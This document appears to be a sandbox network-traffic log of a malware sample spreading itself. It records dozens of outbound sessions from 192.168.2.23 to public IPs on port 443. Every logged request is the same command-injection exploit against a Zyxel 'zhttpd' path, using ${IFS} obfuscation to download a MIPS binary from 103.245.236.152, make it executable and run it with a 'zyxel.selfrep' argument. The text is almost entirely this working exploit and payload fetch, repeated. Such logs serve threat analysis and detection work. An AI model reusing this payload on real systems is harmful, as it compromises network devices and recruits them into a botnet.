                                            Jan 14, 2024 15:50:46.570532084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6217192.168.2.235706864.189.103.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570553064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6218192.168.2.2346164121.137.151.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570583105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6219192.168.2.234660872.185.106.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570626020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6220192.168.2.2338934199.89.96.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570648909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6221192.168.2.2341548159.27.145.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570684910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6222192.168.2.2333492133.116.97.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570707083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6223192.168.2.235618695.31.64.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570749998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6224192.168.2.2360060206.87.198.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570785999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6225192.168.2.233374614.216.191.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570816040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6226192.168.2.234359080.57.228.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570833921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6227192.168.2.2334314151.212.93.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570869923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6228192.168.2.235241418.171.207.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570897102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6229192.168.2.233592466.154.94.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570930004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6230192.168.2.235217835.116.233.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570970058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6231192.168.2.2343354144.132.159.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.570993900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6232192.168.2.235983241.201.223.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571018934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6233192.168.2.2338248213.188.50.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571053028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6234192.168.2.2349034173.145.65.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571069956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6235192.168.2.235919436.203.137.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571089029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6236192.168.2.2360498212.27.22.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571135044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6237192.168.2.234740875.31.83.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571165085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6238192.168.2.233323419.65.242.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571187019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6239192.168.2.235430475.104.106.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571191072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6240192.168.2.234365236.145.109.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571206093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6241192.168.2.2337694203.150.176.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571233034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6242192.168.2.2352198190.40.167.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571281910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6243192.168.2.2335396108.131.112.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571311951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6244192.168.2.233846638.222.144.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571346045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6245192.168.2.2340298145.127.20.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571360111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6246192.168.2.2341722182.81.219.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571407080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6247192.168.2.235078244.127.198.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571444988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6248192.168.2.2347462102.151.223.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571450949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6249192.168.2.235165245.182.47.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571480036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6250192.168.2.2356026160.114.208.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571520090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6251192.168.2.2333614213.87.117.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571546078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6252192.168.2.2340444187.129.94.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571590900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6253192.168.2.2339262153.66.115.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571625948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6254192.168.2.2342922177.68.17.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571638107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6255192.168.2.233551645.248.128.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571686983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6256192.168.2.234654676.21.245.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571691990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6257192.168.2.235954486.210.247.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571748018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6258192.168.2.235111264.20.214.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571763992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6259192.168.2.2335808178.201.74.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571789026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6260192.168.2.235641876.64.44.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571822882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6261192.168.2.2333112128.127.167.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571860075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6262192.168.2.2349758109.245.189.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571901083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6263192.168.2.2349268147.134.49.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571919918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6264192.168.2.233619837.241.75.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571954966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6265192.168.2.235448624.200.220.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571988106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6266192.168.2.2333620220.253.179.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.571995974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6267192.168.2.234840095.158.5.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572024107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6268192.168.2.2358546173.185.88.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572043896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6269192.168.2.2352154219.204.76.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572119951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6270192.168.2.2359388172.49.192.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572129965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6271192.168.2.2357060198.143.1.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572148085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6272192.168.2.2338814141.89.147.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572191000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6273192.168.2.2334114184.54.66.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572213888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6274192.168.2.233679413.60.150.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572235107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6275192.168.2.2348124113.192.205.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572268963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6276192.168.2.234026672.86.159.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572293997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6277192.168.2.2341168206.34.136.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572329998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6278192.168.2.234776687.235.7.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572360039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6279192.168.2.233331839.29.37.186443
                                            TimestampBytes transferredDirectionData
